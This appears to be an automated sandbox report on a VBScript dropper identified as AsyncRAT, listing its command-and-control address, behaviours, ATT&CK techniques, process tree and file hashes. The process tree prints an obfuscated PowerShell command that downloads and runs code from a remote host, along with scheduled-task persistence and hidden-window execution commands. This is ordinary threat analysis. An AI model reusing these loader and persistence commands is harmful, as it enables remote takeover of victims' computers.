Overview

overview

10

Static

static

1

f.vbs

windows7-x64

8

f.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-06-2023 18:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f.vbs

  • Size

    346B

  • MD5

    41e54b45d2ab4718156a2d978aeb2eaa

  • SHA1

    b8f924f1fd50d3feba999029615ae6d2b47ecea7

  • SHA256

    eac03f7bc83d42d686c55a12736a74086e1feada3ef4181f79c5435311a5358d

  • SHA512

    96a51af6ebb69dc01971fef39a5e033417a02299080804a7062182f64be5b9c5ce0ac863397e34bfeca5a1b1c767883a4b6b3888e36e8f443ac0f1bb661e7727

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Default

C2

195.178.120.137:4001

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s3='IeX(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$HJDRRRUY='kdsa4(''http://195.178.120.137:222/d.jpg'')'.RePLACe('kdsa4','ADSTRING');Sleep 1;IeX($s3+$kds+$HJDRRRUY);
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn iony /tr C:\ProgramData\iony\iony.vbs
        3⤵
        • Creates scheduled task(s)
        PID:1504
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\ProgramData\iony\iony.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3480
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\iony\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:408
      • C:\Windows\system32\cmd.exe
        CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\iony\gtrx.ps1"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\iony\gtrx.ps1"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4580
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\iony\1.bat
    Filesize

    87B

    MD5

    32d0e70af67162f90d00a6cfcf767002

    SHA1

    6bcc0f8a9f16731120124224292e666cf1fdeb2f

    SHA256

    9d075abd26a804c5a986dcc6a0c9bc6c0fba3e0ef95f2ab370f535c584df6d36

    SHA512

    270a5b624b88fafb0d209767f58240490d344224c1efd545b0c435abb269913ed85b7409fe243fc30638bd2e5c6deb3ad23fd71b6852c95c9410e01181e06491

    Download Submit
  • C:\ProgramData\iony\gtrx.ps1
    Filesize

    206KB

    MD5

    df197e6cc99a839d669faa02f1cf3379

    SHA1

    b7301cf02ba22860525a373ac8e9adbf313de2d4

    SHA256

    8a51732f22dd1ff2c5256a959713dd4835e1b98525d7adfd675aa61c956b28b6

    SHA512

    48de13d581a49f70a6a1d3c607071272d249a8ca6194e06a33925f6bd3f66de3407a11390f51c77efcdee525ad9f3ed65fb6e890c60cd45bdab46607e111529d

    Download Submit
  • C:\ProgramData\iony\iony.vbs
    Filesize

    123B

    MD5

    eab67e11ddaad458fcba4d33dcd5f981

    SHA1

    63e830c74b4734d5f6e86fcf571c3ceae0a7bff3

    SHA256

    ae22679fbe174225c5d3b3cf1eb52001ccbdb659b15f830219030e7c519fbe78

    SHA512

    b6f69d8a32a419b4ca5a674fb0da1c85dc3fa8189b0a41da7f0e5f098f70a8f5798fc8d4702f9b01f1fb031ccb8954b92ef2de28a96c166463678ecccfc3f3a7

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1d78440de929512c2c81427409c08cc0

    SHA1

    51f1ddba369d2ecb8cfc2fa49dbccd779c6ae524

    SHA256

    b2ed378989fade7a29dfbf0e9baf5436ac554ebc571b89305a63998391126fe5

    SHA512

    4351c1abe9b21d7acde1759c049eaa1ca8b1723a1ad385255c880221de1e6eca3c6da8de3ffcb664a1eb2587cb905f1c37c7b507ef9142fa0d9a0bb6ea1f4e08

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1aulhfhz.hsl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • memory/1420-143-0x000002852ACE0000-0x000002852ACF0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1420-144-0x000002852ACE0000-0x000002852ACF0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1420-149-0x000002852ACE0000-0x000002852ACF0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1420-150-0x000002852ACE0000-0x000002852ACF0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1420-151-0x000002852ACE0000-0x000002852ACF0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1420-133-0x00000285453F0000-0x0000028545412000-memory.dmp
    Filesize

    136KB

    Download
  • memory/3284-172-0x0000000000400000-0x0000000000416000-memory.dmp
    Filesize

    88KB

    Download
  • memory/3284-174-0x0000000001290000-0x00000000012A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3284-175-0x0000000006040000-0x00000000065E4000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/3284-176-0x0000000005C80000-0x0000000005D12000-memory.dmp
    Filesize

    584KB

    Download
  • memory/3284-177-0x0000000005C70000-0x0000000005C7A000-memory.dmp
    Filesize

    40KB

    Download
  • memory/3284-178-0x0000000006730000-0x00000000067CC000-memory.dmp
    Filesize

    624KB

    Download
  • memory/3284-179-0x00000000067D0000-0x0000000006836000-memory.dmp
    Filesize

    408KB

    Download
  • memory/4580-159-0x000001D5565B0000-0x000001D5565C0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4580-171-0x000001D5565B0000-0x000001D5565C0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4580-158-0x000001D5565B0000-0x000001D5565C0000-memory.dmp
    Filesize

    64KB

    Download